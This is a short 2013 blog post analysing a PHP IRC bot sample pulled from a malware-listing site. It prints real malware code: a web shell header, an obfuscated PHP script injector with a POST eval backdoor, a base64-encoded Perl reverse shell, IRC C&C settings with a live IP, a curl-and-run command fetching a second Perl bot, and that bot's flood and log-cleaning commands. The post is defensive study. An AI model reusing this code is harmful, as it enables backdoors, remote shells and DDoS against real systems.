Irregular Expressions

Apr 28 2013   2:43AM GMT

Looking For Samples?

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Practice is always good.  There is a few sites a look at when I am looking for things to analyze, one that always seems to have something for me to look at is clean-mx.de. I just pulled what looks like a PHP bot off of one of the database entries. I post a snippet below.


^JaVa Coder^ shell v2.0 ^Ojo Dumeh^

body {
color: white; background-color: black;
font-size: 12px;
font-family: Helvetica,Arial,Sans-Serif;
}

<?
$dir = @getcwd();
echo "JaVa Coder 
";
$OS = @PHP_OS;
echo "OSTYPE :$OS 
";
echo "uname -a; $uname 
";
$free = disk_free_space($dir);
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {

One thing I look for in these bots is URL’s / IP’s and Base64 encoded stuff. We have both in this sample, two Base64;


<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlNzZhfnIjIGBhPywlNjklMkMjJTVGYCUzQmk9PyIlMzclMzYjJTJFfDEkJTM2JTMzfCUyRT8iOyQlNjF+JTNEJTVCIiUzNzglMkUxJTM1NyMlMkV+JTMxPyUzNCUzMiUyRT81OCMiJCUyQyU2OSQlMkIlMjI/JTMxfDQlMzF8LiUzM2A1IixpK34iMSQlMzk/MS4xMyElMzIiJTVEQDslNUZ8PTElM0IkJTY5JCU2NiQlMjgjZCU2RmAlNjMjdX5tfGUhJTZFJTc0LiFjb3xvYGtpPyU2NS5tYSU3NEBjJTY4YChALyMlNUMlNjIlNjghZyMlNjZgJTc0fCUzRDEvKSUzRH49IyU2RXUjbCU2Q2ApQGZvcn4oYCU2OSQlM0QlMzAlM0IlNjlAJTNDMyUzQiU2OSUyQiMlMkIjKSQlNjQjbyU2MyN1fm1+JTY1YCU2RSU3NC5+JTc3ciNpPyU3NCU2NXwlMjgiQCUzQ35zY3xyP2klNzAjJTc0QCUzRXwlNjkjZn4lMjh+XyMlMjlkJCU2RiElNjN8JTc1YG1lfiU2RXQkJTJFJTc3JTcyJTY5JTc0QCU2NSUyOEAlNUMiQCUzQyMlNzMlNjMlNzIlNjlwJTc0fiBAaWQ/JTNEJTVGJTIyJTJCQGklMkIjIl9gIHMhcmMjPX4vQC9gIn4rPyU2MX5baT8lNUQlMkIiJTJGY34lNzAvJTNFJTNDQCU1QyMlNUNAJTJGJTczJCU2Mz9yJTY5ISU3MGAlNzQhJTNFfCU1QyUyMiMpIyUzQyU1QyUyRiU3MyFjP3IlNjkjcGB0JTNFfiUyMkAlMjkjOycpLnJlcGxhY2UoL2B8XCF8I3xcfHxcJHxcP3xAfH4vZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i

And


$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";

We have what looks to be the IRC C&C.

class pBot
{
var $config = array("server"=>"106.187.97.158",
"port"=>"7000",
"pass"=>"toni",
"prefix"=>"Ddoser",
"maxrand"=>"4",
"chan"=>"#FBI",
"chan2"=>"#CIA",
"key"=>"toni",
"modes"=>"+ps",
"password"=>"toni",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost scanner.crew)

We also have a URL to check out.


<?
$url="http://ircq.wap.sh/";
exec('cd /tmp;curl -O '.$url.'mild2.txt;perl mild2.txt;rm -rf mild2.txt*;');

And it looks like we got another bot to look at in mild2.txt.


#!/usr/bin/perl
#
# What is New in V2.3 ? :
#
# + Improved Scanner
# + Improved Configuration
# + Nmap PortScan
# + LogCleaner
# + Mailer
#
#You can use the following commands :
#!bot @portscan
#!bot @nmap
#!bot @back
#!bot @udpflood
#!bot @tcpflood
#!bot @httpflood
#!bot @linuxhelp
#!bot @hajar
#!bot @system
#!bot @milw0rm
#!bot @logcleaner
#!bot @sendmail
#!bot @join
#!bot @part
#!bot @help
#!bot cd tmp for example
#!bot !eval

It also uses the same IRC server.


$servidor='106.187.97.158' unless $servidor;
my $porta='7000';

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: